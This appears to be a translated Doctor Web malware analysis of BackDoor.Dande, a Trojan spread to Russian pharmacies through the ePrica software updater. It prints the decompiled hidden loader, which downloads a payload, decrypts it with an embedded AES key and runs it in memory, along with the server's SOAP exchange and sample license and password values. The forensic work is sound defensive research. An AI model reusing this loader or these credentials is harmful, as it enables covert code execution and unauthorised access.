Cyber ​​attacks on pharmacies, industrial espionage, insider and 4-year investigation. It would seem, what have the "Peter"?

Usually we do not tell anyone or anyone about the investigation. Painfully this is a subtle topic. But circumstances almost force :) Yesterday you could read the news in simple words, but today we will tell you how it was all technically arranged. If you missed: we are talking about an update in a post about Trojan. Encoder.12544 , also known as Peter, non-Pet, etc. In a nutshell:

Back in 2012, virus analysts of Doctor Web revealed a targeted attack on a network of Russian pharmacies and pharmaceutical companies using the BackDoor.Dande malicious program. This spyware Trojan stole information about the procurement of medicines from specialized programs used in the pharmaceutical industry. At the time of launch, the backdoor checked whether the corresponding applications for ordering and accounting for the purchases of drugs were installed in the system, and, if they were not available, stopped their work. Over 2,800 pharmacies and Russian pharmaceutical companies were infected. Thus, it can be stated with some confidence that BackDoor.Dande was used for industrial espionage.

Experts of Doctor Web conducted an investigation that lasted as long as 4 years. After analyzing the hard drives provided by one of the companies affected by BackDoor.Dande, virus analysts set the date of the creation of the driver, which runs all the other components of the backdoor.

Mention of this driver was found in the Windows paging file and the Avast Antivirus log, which was installed on the infected machine. Analysis of these files showed that the malicious driver was created immediately after the launch of the ePrica application (D: \ ePrica \ App \ PriceCompareLoader.dll). This application, developed by Spargo Technologies, allows pharmacy managers to analyze the rates for medicines and select the best supplier. The study of the ePrica program allowed us to establish that it loads into the memory a library that secretly downloads, decrypts and launches BackDoor.Dande in memory. The Trojan was downloaded from ws.eprica.ru , owned by Spargo Technologies, and intended to update the ePrica program. At the same time, the module that secretly downloaded the malicious program had a valid digital signature “Spargo”. The Trojan downloaded the stolen data to servers outside of Russia. In other words, as in the situation with Trojan.Encoder.12544, the backdoor “hid” in the update module of this program.

So, to the point!
')
BackDoor.Dande.61

Added to Dr.Web virus database: 2016-12-08
Description added: 2017-06-30

64b57c90bcbf71ae4a28f8f742821c123bfb8061 installer
driver 1 65384de87e53a9249553b6f38c9b48da3ec4e041
driver 2 1a22a6c9cd04b25a108e08aa6e35637154e5aee6
Trojan 781262c98f1bdd4e61cd888f71ccc712ff296bf6
PriceCompareLoader.dll b3915aa38551a5b5270b23e372ae1241161ec598
PriceComparePm.dll 014a9166c5516a5193b6b638eeae635170f25829

Trojan backdoor designed to steal information about the purchase of medicines from pharmacies and pharmaceutical companies. Doctor Web has investigated the source of infection with this version of the malware. In the studied sample, the driver tapec.sys (Dande), which runs all the other components of the Trojan, was created on April 28, 2016:

04/28/16 11:34:59.9062500000;12/11/02 23:14:32.0000000000;06/16/16 12:28:52.5468750000 C:\Windows\System32\drivers\msteeb.sys
04/28/16 11:35:00.2031250000;04/15/08 17:00:00.0000000000;06/16/16 12:28:52.5312500000 C:\Windows\System32\drivers\tapec.sys
04/28/16 11:35:01.0468750000;12/25/08 22:00:20.0000000000;06/16/16 12:28:53.6250000000 C:\Windows\System32\drivers\telephona.cpl

A search for tapec.sys showed its presence in two files:

pagefile.sys ( )
Avast\URL.db ( Avast sqllite3)

The database contains two tables:

sqlite> .schema
CREATE TABLE Paths (Time INTEGER, Path TEXT COLLATE NOCASE UNIQUE, ShortHash INTEGER, LongHash BLOB PRIMARY KEY, Flags INTEGER);
CREATE TABLE URLs (Time INTEGER, URL TEXT, ShortHash INTEGER, LongHash BLOB PRIMARY KEY, Flags INTEGER);
CREATE INDEX PathsPathIndex ON Paths (Path COLLATE NOCASE);
CREATE INDEX URLsShortHashIndex ON URLs (ShortHash);

where Paths is the list of programs that were run on the computer being examined. Repeated search in the range of one day before and after the creation of the malicious driver revealed two interesting events:

1461832499|D:\ePrica\App\PriceCompareLoader.dll|2038233152|
1461832500|C:\WINDOWS\system32\drivers\tapec.sys|2510498394|

The malicious driver was created a second after the launch of the D: \ ePrica \ App \ PriceCompareLoader.dll library, which is part of the ePrica application.

EPica research

ePrica is an application developed by Spargo Technologies, which allows pharmacy managers to analyze the prices for medicines and select the optimal supplier. The PriceCompareLoader.dll library used by this program has three exported functions:

MemoryLoadLibrary
MemoryGetProcAddress
MemoryFreeLibrary

All these functions perform the launch of libraries in memory. PriceCompareLoader.dll is called from PriceComparePm.dll. The library is obfuscated using .NET Reactor 4.7. This library is trying to download the payload from the site, decrypt it using the AES algorithm and run it from memory. Below is the code to download and run the file:

 public static void Download() { try { if (!UpdateDownloader.bool_0) { Guid sessionId = Settings.SESSION.SessionId; if (!(sessionId == Guid.Empty)) { UpdateService updateService = new UpdateService(); MyUtils.ConfigureWebServiceProxy(updateService, false); int @int = SettingsAllUsers.GetInt("UPDATE_FLAG"); if (@int >= 0) { bool success = false; if (@int > 0) { success = true; } DateTime date = SettingsAllUsers.GetDate("UPDATE_FLAG_MODIFIED"); updateService.ResetUpdateFlag(sessionId, success, date); SettingsAllUsers.SetDirect("UPDATE_FLAG", -1); } else if (updateService.CheckUpdateFlag(sessionId)) { byte[] array = new byte[UpdateDownloader.qOmraPoxb]; int num = 0; while (true) { byte[] array2 = updateService.Load(sessionId, num); try { array2 = AesEncryptor.Decrypt(array2, UpdateDownloader.byte_0, UpdateDownloader.byte_1); } catch { num = 0; break; } int num2 = 0; if (array2 != null) { num2 = array2.Length; } if (num2 == 0 || num + num2 > UpdateDownloader.qOmraPoxb) { break; } Array.Copy(array2, 0, array, num, num2); num += num2; } if (num > 0 && num <= UpdateDownloader.qOmraPoxb) { Array.Resize<byte>(ref array, num); UpdateDownloader.bool_0 = true; Thread thread = new Thread(new ParameterizedThreadStart(UpdateDownloader.smethod_0)); thread.Start(array); } else { updateService.ResetUpdateFlag(sessionId, false, DateTime.get_Now()); } } } } } catch { } } 

Key and vector AES:

 static UpdateDownloader() { Class3.uNNUGvkzmboS2(); UpdateDownloader.qOmraPoxb = 2097152; UpdateDownloader.byte_0 = new byte[] { 57, 75, 140, 42, 22, 100, 103, 39, 168, 179, 86, 81, 247, 11, 224, 242, 23, 154, 186, 128, 130, 171, 200, 170, 128, 217, 247, 238, 80, 200, 146, 12 }; UpdateDownloader.byte_1 = new byte[] { 88, 199, 157, 130, 155, 231, 168, 148, 97, 45, 227, 215, 3, 234, 61, 172 }; } 

Update verification code:

 private static void smethod_0(object object_0) { bool flag = false; try { byte[] array = object_0 as byte[]; if (array != null) { SettingsAllUsers.SetDirect("UPDATE_FLAG", -2); flag = CheckUpdate.Check(array); } } catch { } finally { try { if (flag) { SettingsAllUsers.SetDirect("UPDATE_FLAG", 1); } else { SettingsAllUsers.SetDirect("UPDATE_FLAG", 0); } SettingsAllUsers.SetDirect("UPDATE_FLAG_MODIFIED", DateTime.get_Now()); } catch { } UpdateDownloader.bool_0 = false; } } 

Startup code from memory:

 public static bool Check(byte[] byte_0) { IntPtr intPtr = IntPtr.Zero; IntPtr intPtr2 = IntPtr.Zero; try { if (byte_0 == null) { bool result = false; return result; } intPtr2 = Marshal.AllocHGlobal(byte_0.Length); Marshal.Copy(byte_0, 0, intPtr2, byte_0.Length); intPtr = CheckUpdate.Class1.MemoryLoadLibrary(intPtr2); if (intPtr == IntPtr.Zero) { bool result = false; return result; } IntPtr intPtr3 = CheckUpdate.Class1.MemoryGetProcAddress(intPtr, "ModuleFunction"); if (intPtr3 == IntPtr.Zero) { bool result = false; return result; } CheckUpdate.Delegate0 @delegate = (CheckUpdate.Delegate0)Marshal.GetDelegateForFunctionPointer(intPtr3, typeof(CheckUpdate.Delegate0)); @delegate(IntPtr.Zero, IntPtr.Zero, IntPtr.Zero); } catch { bool result = false; return result; } finally { try { if (intPtr != IntPtr.Zero) { CheckUpdate.Class1.MemoryFreeLibrary(intPtr); } } catch { } try { if (intPtr2 != IntPtr.Zero) { Marshal.FreeHGlobal(intPtr2); } } catch { } } return true; } 

Protocol

The library communicates with a remote server using the SOAP HTTP protocol. For authorization, a POST request is sent to the server ws.eprica.ru/app/InfoService.asmx with the following header:

'SOAPAction': "http://www.spargo.ru/es/LoginEx"

The data for authorization has the following structure:

 <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <LoginEx xmlns="http://www.spargo.ru/es"> <wsUser> <LicenseNumber>071122-164229</LicenseNumber> <SessionId>00000000-0000-0000-0000-000000000000</SessionId> <GuidDrugstore>00000000-0000-0000-0000-000000000000</GuidDrugstore> <KodDrugstore>105570</KodDrugstore> <Login></Login> <PasswordHash>/9P+uFEEaqgoKiKOQOZnOw==</PasswordHash> <Version>4.0.26.30</Version> <ComputerInfoHash>NVQKLJBTV1</ComputerInfoHash> <AccessCode>ED287118-3933-4E97-95A7-9D3C4CF94421</AccessCode> <DownloadedUpdateVersion>4.0.23.17</DownloadedUpdateVersion> </wsUser> <password>1230456</password> </LoginEx> </soap:Body> </soap:Envelope> 

In response, a sessionId of the following form arrives:

 <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <LoginExResponse xmlns="http://www.spargo.ru/es"> <LoginExResult> <SessionId>64ad19a5-d8c3-481c-a95e-95ce9a3722ff</SessionId> <AccessCodeNew>F06BBB44-558B-4C43-A278-1E7B787FE986</AccessCodeNew> <ContentServiceUrl>https://pharmadata.ru/content/ContentUploadService.asmx</ContentServiceUrl> <PackSize>0</PackSize> <MobOrderCheckIntervalSec>300</MobOrderCheckIntervalSec> <IsMobOrderDisabled>false</IsMobOrderDisabled> <HasMobOrder>false</HasMobOrder> <LastLogSave>2016-12-08T12:41:44.0065516+03:00</LastLogSave> </LoginExResult> </LoginExResponse> </soap:Body> </soap:Envelope> 

To receive the payload, a request is sent to the server ws.eprica.ru/app/UpdateService.asmx with the following header:

"SOAPAction": 'http://www.spargo.ru/es/Load'

The following xml file is transmitted:

 <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <Load xmlns="http://www.spargo.ru/es"> <guidSession>%s</guidSession> <offset>%d</offset> </Load> </soap:Body> </soap:Envelope> 

The offset parameter is used because the file is given in parts. The server response is as follows:

 <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <LoadResponse xmlns="http://www.spargo.ru/es"> <LoadResult>fzzvOyrIohvnXggrGy35PtG9BG79/v7MebMKMMu+lN... </LoadResult> </LoadResponse> </soap:Body> </soap:Envelope> 

The base64 transmitted payload is encrypted using the AES algorithm. It contains the installer BackDoor.Dande. The library itself has a valid SPARGO Technologies digital signature:



During the installation process, BackDoor.Dande deletes files from the old version of Dande: isaPnpPrt.sys, RpcSsPrt.sys, BackDoor.Dande.2. The Trojan chooses a random name from the% SYSTEM32% \ drivers \ folder and saves its copy with the same name, but adds a few random characters to the end. The Trojan extracts files for saving from the .cdata and .bdata sections; the data is stored in the BackDoor.Dande.2 container. In the driver, which has SHA1 65384de87e53a9249553b6f38c9b48da3ec4e041, the name is updated to an encrypted container, thus removing the digital signature that was previously valid. The rest of the installation procedure is similar to that for BackDoor.Dande.2.

vms.drweb.ru/virus/?i=15448691&lng=ru

In other words, as in the situation with Trojan.Encoder.12544, the backdoor “hid” in the update module of this program.

The similarity of these two cases shows that the software development infrastructure requires increased attention to information security issues. First of all, the process of updating any commercial software should be under the scrutiny of both the developers and users. Update utilities of various programs that have the rights to install and run executable files in the operating system may unexpectedly become a source of infection. In the case of MEDoc, the hackers and the compromising of the server from which the updates were downloaded hacked this way, and in the situation with BackDoor.Dande, experts believe that the conscious actions of insiders led to the spread of the infection. Through this technique, attackers can conduct an effective targeted attack against users of almost any software.